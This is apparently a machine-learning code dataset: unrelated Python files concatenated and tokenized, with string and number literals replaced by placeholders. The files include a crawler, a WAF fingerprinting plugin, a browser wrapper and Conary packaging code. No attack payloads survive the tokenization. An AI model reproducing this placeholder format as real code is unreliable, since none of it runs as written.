if path not in self . crawlpaths : <EOL> href = unquote ( path ) <EOL> self . log . debug ( '<STR_LIT>' % href ) <EOL> self . crawlpaths . append ( href ) <EOL> localcrawlpaths . append ( href ) <EOL> except KeyError : <EOL> pass <EOL> for nextpath in localcrawlpaths : <EOL> r = self . querycrawler ( path = nextpath , curdepth = curdepth + <NUM_LIT:1> , maxdepth = maxdepth ) <EOL> if r : <EOL> return r <EOL> def _parse_proxy ( self , proxy ) : <EOL> parts = urlparse ( proxy ) <EOL> if not parts . scheme or not parts . 
netloc : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> netloc = parts . netloc . split ( "<STR_LIT::>" ) <EOL> if len ( netloc ) != <NUM_LIT:2> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> try : <EOL> if parts . scheme == "<STR_LIT>" : <EOL> if socks is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return Socks5Proxy ( netloc [ <NUM_LIT:0> ] , int ( netloc [ <NUM_LIT:1> ] ) ) <EOL> elif parts . scheme == "<STR_LIT:http>" : <EOL> return HttpProxy ( netloc [ <NUM_LIT:0> ] , int ( netloc [ <NUM_LIT:1> ] ) ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> except ValueError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def scrambledheader ( header ) : <EOL> c = '<STR_LIT>' <EOL> if len ( header ) != len ( c ) : <EOL> return False <EOL> if header == c : <EOL> return False <EOL> for character in c : <EOL> if c . count ( character ) != header . count ( character ) : <EOL> return False <EOL> return True </s>
<s> NAME = '<STR_LIT>' <EOL> def is_waf ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . matchcookie ( '<STR_LIT>' ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT>' ) , attack = True ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT>' ) , attack = True ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT>' ) , attack = True ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT:.>' ) , attack = True ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return True <EOL> if self . matchcookie ( '<STR_LIT>' ) : <EOL> return True <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> import os , sys , time , logging <EOL> from subprocess import * <EOL> import resource <EOL> import utils <EOL> from config import settings <EOL> log = logging . getLogger ( ) <EOL> blank = '<STR_LIT>' <EOL> _threshold = <NUM_LIT:0> <EOL> def setrlimit ( ) : <EOL> """<STR_LIT>""" <EOL> resource . setrlimit ( resource . RLIMIT_RSS , ( _threshold , _threshold ) ) <EOL> class Browser : <EOL> def __init__ ( self , home = blank ) : <EOL> """<STR_LIT>""" <EOL> self . home = home <EOL> self . launch ( self . home ) <EOL> self . do ( '<STR_LIT>' % home ) <EOL> def launch ( self , home = blank ) : <EOL> """<STR_LIT>""" <EOL> _threshold = settings . uzbl . ram . hard_limit <EOL> self . uzbl = Popen ( [ '<STR_LIT>' , '<STR_LIT>' % ( settings . screen . width , settings . screen . height ) , '<STR_LIT>' % home ] , stdin = PIPE , stdout = PIPE , stderr = PIPE , preexec_fn = setrlimit ) <EOL> self . fifo = '<STR_LIT>' % self . uzbl . pid <EOL> while not os . path . exists ( self . fifo ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . do ( '<STR_LIT>' % home ) <EOL> def terminate ( self ) : <EOL> """<STR_LIT>""" <EOL> self . uzbl . terminate ( ) <EOL> def kill ( self ) : <EOL> """<STR_LIT>""" <EOL> self . uzbl . kill ( ) <EOL> def restart ( self ) : <EOL> """<STR_LIT>""" <EOL> self . uzbl . terminate ( ) <EOL> self . launch ( blank ) <EOL> def blank ( self ) : <EOL> """<STR_LIT>""" <EOL> self . do ( '<STR_LIT>' % blank ) <EOL> def do ( self , buffer ) : <EOL> """<STR_LIT>""" <EOL> returncode = self . uzbl . poll ( ) <EOL> if returncode == None : <EOL> if settings . uzbl . ram . soft_limit < utils . get_pid_rss ( self . uzbl . pid ) : <EOL> log . debug ( "<STR_LIT>" ) <EOL> self . restart ( ) <EOL> log . debug ( buffer ) <EOL> h = open ( self . fifo , '<STR_LIT:a>' ) <EOL> h . write ( "<STR_LIT>" ) <EOL> h . write ( buffer + '<STR_LIT:\n>' ) <EOL> h . close ( ) <EOL> else : <EOL> log . error ( "<STR_LIT>" % returncode ) <EOL> self . launch ( self . 
home ) <EOL> self . do ( buffer ) </s>
<s> from __future__ import with_statement , print_function , absolute_import <EOL> class Label ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , label_id , name , color = "<STR_LIT>" ) : <EOL> self . client = client <EOL> self . id = label_id <EOL> self . name = name <EOL> self . color = color <EOL> @ classmethod <EOL> def from_json ( cls , board , json_obj ) : <EOL> """<STR_LIT>""" <EOL> label = Label ( board . client , <EOL> label_id = json_obj [ '<STR_LIT:id>' ] , <EOL> name = json_obj [ '<STR_LIT:name>' ] . encode ( '<STR_LIT:utf-8>' ) , <EOL> color = json_obj [ '<STR_LIT>' ] ) <EOL> return label <EOL> @ classmethod <EOL> def from_json_list ( cls , board , json_objs ) : <EOL> return [ cls . from_json ( board , obj ) for obj in json_objs ] <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> def fetch ( self ) : <EOL> """<STR_LIT>""" <EOL> json_obj = self . client . fetch_json ( '<STR_LIT>' + self . id ) <EOL> self . name = json_obj [ '<STR_LIT:name>' ] . encode ( '<STR_LIT:utf-8>' ) <EOL> self . color = json_obj [ '<STR_LIT>' ] <EOL> return self </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import re <EOL> from vex import exceptions <EOL> try : <EOL> FileNotFoundError <EOL> except NameError : <EOL> FileNotFoundError = IOError <EOL> NOT_SCARY = re . compile ( br'<STR_LIT>' ) <EOL> def scary_path ( path ) : <EOL> """<STR_LIT>""" <EOL> if not path : <EOL> return True <EOL> assert isinstance ( path , bytes ) <EOL> return not NOT_SCARY . match ( path ) <EOL> def shell_config_for ( shell , vexrc , environ ) : <EOL> """<STR_LIT>""" <EOL> here = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> path = os . path . join ( here , '<STR_LIT>' , shell ) <EOL> try : <EOL> with open ( path , '<STR_LIT:rb>' ) as inp : <EOL> data = inp . read ( ) <EOL> except FileNotFoundError as error : <EOL> if error . errno != <NUM_LIT:2> : <EOL> raise <EOL> return b'<STR_LIT>' <EOL> ve_base = vexrc . get_ve_base ( environ ) . encode ( '<STR_LIT:ascii>' ) <EOL> if ve_base and not scary_path ( ve_base ) and os . path . exists ( ve_base ) : <EOL> data = data . replace ( b'<STR_LIT>' , ve_base ) <EOL> return data <EOL> def handle_shell_config ( shell , vexrc , environ ) : <EOL> """<STR_LIT>""" <EOL> from vex import shell_config <EOL> data = shell_config . shell_config_for ( shell , vexrc , environ ) <EOL> if not data : <EOL> raise exceptions . OtherShell ( "<STR_LIT>" . format ( shell ) ) <EOL> if hasattr ( sys . stdout , '<STR_LIT>' ) : <EOL> sys . stdout . buffer . write ( data ) <EOL> else : <EOL> sys . stdout . write ( data ) <EOL> return <NUM_LIT:0> </s>
<s> import os <EOL> from conary import files <EOL> from conary . build import defaultrecipes <EOL> from conary . build . packagerecipe import AbstractPackageRecipe , BaseRequiresRecipe <EOL> from conary . repository import changeset <EOL> class DerivedChangesetExploder ( changeset . ChangesetExploder ) : <EOL> def __init__ ( self , recipe , cs , destDir ) : <EOL> self . byDefault = { } <EOL> self . troveFlavor = None <EOL> self . recipe = recipe <EOL> changeset . ChangesetExploder . __init__ ( self , cs , destDir ) <EOL> def installingTrove ( self , trv ) : <EOL> if self . troveFlavor is None : <EOL> self . troveFlavor = trv . getFlavor ( ) . copy ( ) <EOL> else : <EOL> assert ( self . troveFlavor == trv . getFlavor ( ) ) <EOL> name = trv . getName ( ) <EOL> self . recipe . _componentReqs [ name ] = trv . getRequires ( ) . copy ( ) <EOL> self . recipe . _componentProvs [ name ] = trv . getProvides ( ) . copy ( ) <EOL> if trv . isCollection ( ) : <EOL> self . byDefault . update ( dict ( <EOL> [ ( x [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] ) for x in trv . iterTroveListInfo ( ) ] ) ) <EOL> changeset . ChangesetExploder . installingTrove ( self , trv ) <EOL> def handleFileAttributes ( self , trv , fileObj , path ) : <EOL> self . troveFlavor -= fileObj . flavor ( ) <EOL> if fileObj . flags . isConfig ( ) : <EOL> self . recipe . Config ( path , allowUnusedFilters = True ) <EOL> elif fileObj . flags . isInitialContents ( ) : <EOL> self . recipe . InitialContents ( path , allowUnusedFilters = True ) <EOL> elif fileObj . flags . isTransient ( ) : <EOL> self . recipe . Transient ( path , allowUnusedFilters = True ) <EOL> if isinstance ( fileObj , files . SymbolicLink ) : <EOL> self . recipe . _derivedFiles [ path ] = fileObj . target ( ) <EOL> else : <EOL> self . recipe . _derivedFiles [ path ] = fileObj . inode . mtime ( ) <EOL> self . recipe . _componentReqs [ trv . getName ( ) ] -= fileObj . requires ( ) <EOL> self . recipe . _componentProvs [ trv . 
getName ( ) ] -= fileObj . requires ( ) <EOL> def handleFileMode ( self , trv , fileObj , path , destdir ) : <EOL> if isinstance ( fileObj , files . SymbolicLink ) : <EOL> return <EOL> fullPath = '<STR_LIT:/>' . join ( ( destdir , path ) ) <EOL> mode = fileObj . inode . perms ( ) <EOL> os . chmod ( fullPath , mode & <NUM_LIT:0> <NUM_LIT> ) <EOL> if fileObj . inode . perms ( ) & <NUM_LIT:0> <NUM_LIT> != <NUM_LIT:0> : <EOL> self . recipe . setModes ( path , sidbits = ( mode & <NUM_LIT:0> <NUM_LIT> ) ) <EOL> if isinstance ( fileObj , files . Directory ) : <EOL> if ( fileObj . inode . perms ( ) & <NUM_LIT:0> <NUM_LIT> ) != <NUM_LIT:0> <NUM_LIT> : <EOL> os . chmod ( fullPath , ( mode & <NUM_LIT:0> <NUM_LIT> ) | <NUM_LIT:0> <NUM_LIT> ) <EOL> self . recipe . setModes ( path , userbits = ( mode & <NUM_LIT:0> <NUM_LIT> ) ) <EOL> self . recipe . ExcludeDirectories ( exceptions = path , <EOL> allowUnusedFilters = True ) <EOL> def restoreFile ( self , trv , fileObj , contents , destdir , path ) : <EOL> self . handleFileAttributes ( trv , fileObj , path ) <EOL> if isinstance ( fileObj , files . DeviceFile ) : <EOL> self . recipe . MakeDevices ( path , fileObj . lsTag , <EOL> fileObj . devt . major ( ) , fileObj . devt . minor ( ) , <EOL> fileObj . inode . owner ( ) , fileObj . inode . group ( ) , <EOL> fileObj . inode . perms ( ) ) <EOL> else : <EOL> changeset . ChangesetExploder . restoreFile ( self , trv , fileObj , <EOL> contents , destdir , path ) <EOL> self . handleFileMode ( trv , fileObj , path , destdir ) <EOL> def restoreLink ( self , trv , fileObj , destdir , sourcePath , targetPath ) : <EOL> self . handleFileAttributes ( trv , fileObj , targetPath ) <EOL> changeset . ChangesetExploder . restoreLink ( self , trv , fileObj , destdir , <EOL> sourcePath , targetPath ) <EOL> def installFile ( self , trv , path , fileObj ) : <EOL> if path == self . recipe . macros . buildlogpath : <EOL> return False <EOL> return changeset . ChangesetExploder . 
installFile ( self , trv , path , fileObj ) <EOL> from conary import versions <EOL> from conary import errors as conaryerrors <EOL> from conary . build import build , source <EOL> from conary . build import errors as builderrors <EOL> from conary . lib import log <EOL> class AbstractDerivedPackageRecipe ( AbstractPackageRecipe ) : <EOL> internalAbstractBaseClass = <NUM_LIT:1> <EOL> _isDerived = True <EOL> parentVersion = None <EOL> def _expandChangeset ( self , cs ) : <EOL> exploder = DerivedChangesetExploder ( self , cs , self . macros . destdir ) <EOL> self . useFlags = exploder . troveFlavor <EOL> self . setByDefaultOn ( set ( x for x in exploder . byDefault <EOL> if exploder . byDefault [ x ] ) ) <EOL> self . setByDefaultOff ( set ( x for x in exploder . byDefault <EOL> if not exploder . byDefault [ x ] ) ) <EOL> def unpackSources ( self , resume = None , downloadOnly = False ) : <EOL> repos = self . laReposCache . repos <EOL> if self . parentVersion : <EOL> try : <EOL> parentRevision = versions . Revision ( self . parentVersion ) <EOL> except conaryerrors . ParseError , e : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' % ( self . parentVersion , str ( e ) ) ) <EOL> else : <EOL> parentRevision = None <EOL> sourceBranch = versions . VersionFromString ( self . macros . buildbranch ) <EOL> if not sourceBranch . isShadow ( ) : <EOL> raise builderrors . RecipeFileError ( <EOL> "<STR_LIT>" ) <EOL> if parentRevision and self . sourceVersion . trailingRevision ( ) . getVersion ( ) != parentRevision . getVersion ( ) : <EOL> raise builderrors . RecipeFileError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parentBranch = sourceBranch . parentBranch ( ) <EOL> if parentRevision : <EOL> parentVersion = parentBranch . createVersion ( parentRevision ) <EOL> d = repos . getTroveVersionFlavors ( { self . name : <EOL> { parentVersion : [ None ] } } ) <EOL> if self . name not in d : <EOL> raise builderrors . 
RecipeFileError ( <EOL> '<STR_LIT>' <EOL> % ( parentVersion , self . name ) ) <EOL> elif self . sourceVersion : <EOL> sourceRevision = self . sourceVersion . trailingRevision ( ) <EOL> d = repos . getTroveVersionsByLabel ( <EOL> { self . name : { parentBranch . label ( ) : [ None ] } } ) <EOL> if self . name not in d or not d [ self . name ] : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' % <EOL> ( self . name , parentBranch . label ( ) ) ) <EOL> versionList = reversed ( sorted ( d [ self . name ] ) ) <EOL> match = False <EOL> for version in versionList : <EOL> sr = sourceRevision . copy ( ) <EOL> sr . getSourceCount ( ) . truncateShadowCount ( <EOL> version . trailingRevision ( ) . shadowCount ( ) ) <EOL> if ( version . getSourceVersion ( ) . trailingRevision ( ) == sr ) : <EOL> match = True <EOL> break <EOL> if not match : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' <EOL> % ( self . name , sourceRevision , parentBranch . label ( ) ) ) <EOL> parentVersion = version <EOL> else : <EOL> parentVersion = parentBranch <EOL> try : <EOL> troveList = repos . findTrove ( None , <EOL> ( self . name , parentVersion , self . _buildFlavor ) ) <EOL> except conaryerrors . TroveNotFound , err : <EOL> raise builderrors . RecipeFileError ( '<STR_LIT>' + str ( err ) ) <EOL> if len ( troveList ) > <NUM_LIT:1> : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' % ( self . name , parentVersion , self . cfg . buildFlavor ) ) <EOL> parentFlavor = troveList [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> parentVersion = troveList [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> log . info ( '<STR_LIT>' , self . name , parentVersion , <EOL> parentFlavor ) <EOL> v = parentVersion . getSourceVersion ( removeShadows = False ) <EOL> binaries = repos . getTrovesBySource ( self . 
name + '<STR_LIT>' , v ) <EOL> binaries = [ x for x in binaries if ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:2> ] ) == ( parentVersion , <EOL> parentFlavor ) ] <EOL> troveSpec = [ ( x [ <NUM_LIT:0> ] , ( None , None ) , ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:2> ] ) , True ) <EOL> for x in binaries ] <EOL> cs = repos . createChangeSet ( troveSpec , recurse = False ) <EOL> for trv in cs . iterNewTroveList ( ) : <EOL> if trv . hasCapsule ( ) : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % trv . name ( ) ) <EOL> self . setDerivedFrom ( [ <EOL> ( x . getName ( ) , x . getNewVersion ( ) , x . getNewFlavor ( ) ) for x <EOL> in cs . iterNewTroveList ( ) ] ) <EOL> self . _expandChangeset ( cs ) <EOL> self . cs = cs <EOL> klass = self . _getParentClass ( '<STR_LIT>' ) <EOL> klass . unpackSources ( self , resume = resume , <EOL> downloadOnly = downloadOnly ) <EOL> def loadPolicy ( self ) : <EOL> klass = self . _getParentClass ( '<STR_LIT>' ) <EOL> return klass . loadPolicy ( self , <EOL> internalPolicyModules = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) ) <EOL> def __init__ ( self , cfg , laReposCache , srcDirs , extraMacros = { } , <EOL> crossCompile = None , lightInstance = False ) : <EOL> klass = self . _getParentClass ( '<STR_LIT>' ) <EOL> klass . __init__ ( self , cfg , laReposCache , srcDirs , <EOL> extraMacros = extraMacros , <EOL> crossCompile = crossCompile , <EOL> lightInstance = lightInstance ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Ant ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Automake ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . ClassPath ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . CompilePython ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Configure ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . ConsoleHelper ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Copy ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Create ) <EOL> self . 
_addBuildAction ( '<STR_LIT>' , build . Desktopfile ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Doc ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Environment ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Install ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . JavaCompile ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . JavaDoc ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Link ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Make ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . MakeDirs ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . MakeInstall ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . MakeParallelSubdir ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . MakePathsInstall ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . ManualConfigure ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Move ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . PythonSetup ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Remove ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Replace ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Run ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . SetModes ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . SGMLCatalogEntry ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Symlink ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . XInetdService ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . XMLCatalogEntry ) <EOL> self . _addSourceAction ( '<STR_LIT>' , source . addArchive ) <EOL> self . _addSourceAction ( '<STR_LIT>' , source . addAction ) <EOL> self . _addSourceAction ( '<STR_LIT>' , source . addPatch ) <EOL> self . _addSourceAction ( '<STR_LIT>' , source . addSource ) <EOL> exec defaultrecipes . DerivedPackageRecipe </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from conary . build import filter <EOL> from conary . lib . cfg import CfgEnum , CfgList , CfgString , ConfigFile , ParseError <EOL> from conary . lib . cfg import directive <EOL> EXCLUDE , INCLUDE = range ( <NUM_LIT:2> ) <EOL> class CfgImplementsItem ( CfgEnum ) : <EOL> validValueDict = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> def __init__ ( self ) : <EOL> validValues = [ ] <EOL> for fileType , actionList in self . validValueDict . iteritems ( ) : <EOL> validValues . extend ( '<STR_LIT:U+0020>' . join ( ( fileType , x ) ) for x in actionList ) <EOL> self . validValues = validValues <EOL> CfgEnum . __init__ ( self ) <EOL> def checkEntry ( self , val ) : <EOL> if val . find ( "<STR_LIT:U+0020>" ) < <NUM_LIT:0> : <EOL> raise ParseError , '<STR_LIT>' % val <EOL> CfgEnum . checkEntry ( self , val ) <EOL> CfgImplements = CfgList ( CfgImplementsItem ) <EOL> class CfgDataSource ( CfgEnum ) : <EOL> validValues = [ '<STR_LIT:args>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class TagFile ( ConfigFile ) : <EOL> file = CfgString <EOL> name = CfgString <EOL> description = CfgString <EOL> datasource = ( CfgDataSource , '<STR_LIT:args>' ) <EOL> implements = CfgImplements <EOL> def __init__ ( self , filename , macros = { } , warn = False ) : <EOL> ConfigFile . __init__ ( self ) <EOL> self . tag = os . path . basename ( filename ) <EOL> self . tagFile = filename <EOL> self . macros = macros <EOL> self . filterlist = [ ] <EOL> self . read ( filename , exception = True ) <EOL> if '<STR_LIT>' in self . __dict__ : <EOL> for item in self . __dict__ [ '<STR_LIT>' ] : <EOL> if item . find ( "<STR_LIT:U+0020>" ) < <NUM_LIT:0> : <EOL> raise ParseError , '<STR_LIT>' % item <EOL> key , val = item . 
split ( "<STR_LIT:U+0020>" ) <EOL> if key == '<STR_LIT:description>' : <EOL> if warn : <EOL> raise ParseError , '<STR_LIT>' % ( key , filename ) <EOL> continue <EOL> @ directive <EOL> def include ( self , val ) : <EOL> if not self . macros : <EOL> return <EOL> self . filterlist . append ( ( INCLUDE , filter . Filter ( val , self . macros ) ) ) <EOL> @ directive <EOL> def exclude ( self , val ) : <EOL> if not self . macros : <EOL> return <EOL> self . filterlist . append ( ( EXCLUDE , filter . Filter ( val , self . macros ) ) ) <EOL> def match ( self , filename ) : <EOL> for keytype , filter in self . filterlist : <EOL> if filter . match ( filename ) : <EOL> if keytype == EXCLUDE : <EOL> return False <EOL> else : <EOL> return True <EOL> return False <EOL> def loadTagDict ( dirPath ) : <EOL> d = { } <EOL> try : <EOL> files = os . listdir ( dirPath ) <EOL> except OSError : <EOL> return { } <EOL> for path in files : <EOL> if path . startswith ( '<STR_LIT:.>' ) : <EOL> continue <EOL> c = TagFile ( os . path . join ( dirPath , path ) ) <EOL> d [ c . tag ] = c <EOL> return d </s>
<s> from conary . deps import deps <EOL> from conary . repository import changeset <EOL> from conary . repository import errors as repoerrors <EOL> from conary import errors <EOL> from conary import versions <EOL> from conary import trove <EOL> class BranchError ( errors . ClientError ) : <EOL> pass <EOL> class ClientBranch ( object ) : <EOL> BRANCH_SOURCE = <NUM_LIT:1> << <NUM_LIT:0> <EOL> BRANCH_BINARY = <NUM_LIT:1> << <NUM_LIT:1> <EOL> BRANCH_ALL = BRANCH_SOURCE | BRANCH_BINARY <EOL> __developer_api__ = True <EOL> def createBranchChangeSet ( self , newLabel , <EOL> troveList = [ ] , branchType = BRANCH_ALL , <EOL> sigKeyId = None ) : <EOL> return self . _createBranchOrShadow ( newLabel , troveList , shadow = False , <EOL> branchType = branchType , <EOL> sigKeyId = sigKeyId ) <EOL> def createShadowChangeSet ( self , newLabel , troveList = [ ] , <EOL> branchType = BRANCH_ALL , <EOL> sigKeyId = None , <EOL> allowEmptyShadow = False ) : <EOL> return self . _createBranchOrShadow ( newLabel , troveList , shadow = True , <EOL> branchType = branchType , <EOL> sigKeyId = sigKeyId , <EOL> allowEmptyShadow = allowEmptyShadow ) <EOL> def _checkForLaterShadows ( self , newLabel , troves ) : <EOL> query = { } <EOL> for trv in troves : <EOL> versionDict = query . setdefault ( trv . getName ( ) , { } ) <EOL> b = trv . getVersion ( ) . branch ( ) . createShadow ( newLabel ) <EOL> versionDict [ b ] = None <EOL> results = self . repos . getTroveLeavesByBranch ( query ) <EOL> if not results : <EOL> return [ ] <EOL> oldTroves = [ ] <EOL> for trv in troves : <EOL> versionDict = results . get ( trv . getName ( ) , { } ) <EOL> b = trv . getVersion ( ) . branch ( ) . createShadow ( newLabel ) <EOL> versionList = [ x for x in versionDict if x . branch ( ) == b and not x . isModifiedShadow ( ) ] <EOL> if not versionList : <EOL> continue <EOL> latestVersion = max ( versionList ) <EOL> oldVersion = latestVersion . parentVersion ( ) <EOL> oldTroves . extend ( ( trv . 
getName ( ) , oldVersion , x ) for x in versionDict [ latestVersion ] ) <EOL> shadowedTroves = self . repos . getTroves ( oldTroves , withFiles = False ) <EOL> shadowed = { } <EOL> for shadowedTrove in shadowedTroves : <EOL> ( n , v , f ) = shadowedTrove . getNameVersionFlavor ( ) <EOL> shadowed [ n , v . branch ( ) , f ] = v <EOL> laterShadows = [ ] <EOL> for trv in troves : <EOL> ( n , v , f ) = trv . getNameVersionFlavor ( ) <EOL> shadowedVer = shadowed . get ( ( n , v . branch ( ) , f ) , None ) <EOL> if not shadowedVer : <EOL> continue <EOL> if v < shadowedVer : <EOL> laterShadows . append ( ( n , v , f , shadowedVer ) ) <EOL> return laterShadows <EOL> def _createBranchOrShadow ( self , newLabel , troveList , shadow , <EOL> branchType = BRANCH_ALL , sigKeyId = None , <EOL> allowEmptyShadow = False ) : <EOL> cs = changeset . ChangeSet ( ) <EOL> seen = set ( troveList ) <EOL> sourceTroveList = set ( ) <EOL> troveList = set ( troveList ) <EOL> dupList = [ ] <EOL> needsCommit = False <EOL> newLabel = versions . Label ( newLabel ) <EOL> while troveList : <EOL> troves = self . repos . getTroves ( troveList ) <EOL> troveList = set ( ) <EOL> branchedTroves = { } <EOL> if sourceTroveList : <EOL> for st in sourceTroveList : <EOL> try : <EOL> sourceTrove = self . repos . getTrove ( * st ) <EOL> except repoerrors . TroveMissing : <EOL> if allowEmptyShadow : <EOL> st [ <NUM_LIT:1> ] . resetTimeStamps ( ) <EOL> sourceTrove = trove . Trove ( * st ) <EOL> else : <EOL> raise <EOL> troves . append ( sourceTrove ) <EOL> sourceTroveList = set ( ) <EOL> if shadow : <EOL> laterShadows = self . _checkForLaterShadows ( newLabel , troves ) <EOL> if laterShadows : <EOL> msg = [ ] <EOL> for n , v , f , shadowedVer in laterShadows : <EOL> msg . append ( '''<STR_LIT>''' % ( n , shadowedVer , f , n , v , f ) ) <EOL> raise BranchError ( '<STR_LIT>' . join ( msg ) ) <EOL> for trv in troves : <EOL> if trv . isRedirect ( ) : <EOL> raise errors . ShadowRedirect ( * trv . 
getNameVersionFlavor ( ) ) <EOL> newTroves = [ x for x in <EOL> trv . iterTroveList ( strongRefs = True , <EOL> weakRefs = True ) if x not in seen ] <EOL> troveList . update ( newTroves ) <EOL> seen . update ( newTroves ) <EOL> troveName = trv . getName ( ) <EOL> if troveName . endswith ( '<STR_LIT>' ) : <EOL> if not ( branchType & self . BRANCH_SOURCE ) : <EOL> continue <EOL> elif branchType & self . BRANCH_SOURCE : <EOL> if not trv . getSourceName ( ) : <EOL> from conary . lib import log <EOL> log . warning ( '<STR_LIT>' % troveName ) <EOL> sourceName = troveName <EOL> else : <EOL> sourceName = trv . getSourceName ( ) <EOL> key = ( sourceName , <EOL> trv . getVersion ( ) . getSourceVersion ( False ) , <EOL> deps . Flavor ( ) ) <EOL> if key not in seen : <EOL> seen . add ( key ) <EOL> sourceTroveList . add ( key ) <EOL> if not ( branchType & self . BRANCH_BINARY ) : <EOL> continue <EOL> if shadow : <EOL> branchedVersion = trv . getVersion ( ) . createShadow ( newLabel ) <EOL> else : <EOL> branchedVersion = trv . getVersion ( ) . createBranch ( newLabel , <EOL> withVerRel = <NUM_LIT:1> ) <EOL> branchedTrove = trv . copy ( ) <EOL> branchedTrove . changeVersion ( branchedVersion ) <EOL> branchedTrove . troveInfo . sigs . reset ( ) <EOL> branchedTrove . copyMetadata ( trv ) <EOL> for ( ( name , version , flavor ) , byDefault , isStrong ) in trv . iterTroveListInfo ( ) : <EOL> if shadow : <EOL> branchedVersion = version . createShadow ( newLabel ) <EOL> else : <EOL> branchedVersion = version . createBranch ( newLabel , <EOL> withVerRel = <NUM_LIT:1> ) <EOL> branchedTrove . delTrove ( name , version , flavor , <EOL> missingOkay = False , <EOL> weakRef = not isStrong ) <EOL> branchedTrove . addTrove ( name , branchedVersion , flavor , <EOL> byDefault = byDefault , <EOL> weakRef = not isStrong ) <EOL> key = ( trv . getName ( ) , branchedTrove . getVersion ( ) , <EOL> trv . getFlavor ( ) ) <EOL> if sigKeyId is not None : <EOL> branchedTrove . 
addDigitalSignature ( sigKeyId ) <EOL> else : <EOL> branchedTrove . computeDigests ( ) <EOL> if branchedTrove . getVersion ( ) . trailingLabel ( ) . getHost ( ) == trv . getVersion ( ) . trailingLabel ( ) . getHost ( ) : <EOL> branchedTroves [ key ] = branchedTrove . diff ( trv , <EOL> absolute = False ) [ <NUM_LIT:0> ] <EOL> else : <EOL> branchedTroves [ key ] = branchedTrove . diff ( None , <EOL> absolute = True ) [ <NUM_LIT:0> ] <EOL> hasTroves = self . repos . hasTroves ( branchedTroves ) <EOL> for ( name , version , flavor ) , troveCs in branchedTroves . iteritems ( ) : <EOL> if hasTroves [ name , version , flavor ] : <EOL> dupList . append ( ( name , version . branch ( ) ) ) <EOL> else : <EOL> cs . newTrove ( troveCs ) <EOL> cs . addPrimaryTrove ( name , version , flavor ) <EOL> needsCommit = True <EOL> if not needsCommit : <EOL> cs = None <EOL> return dupList , cs </s>
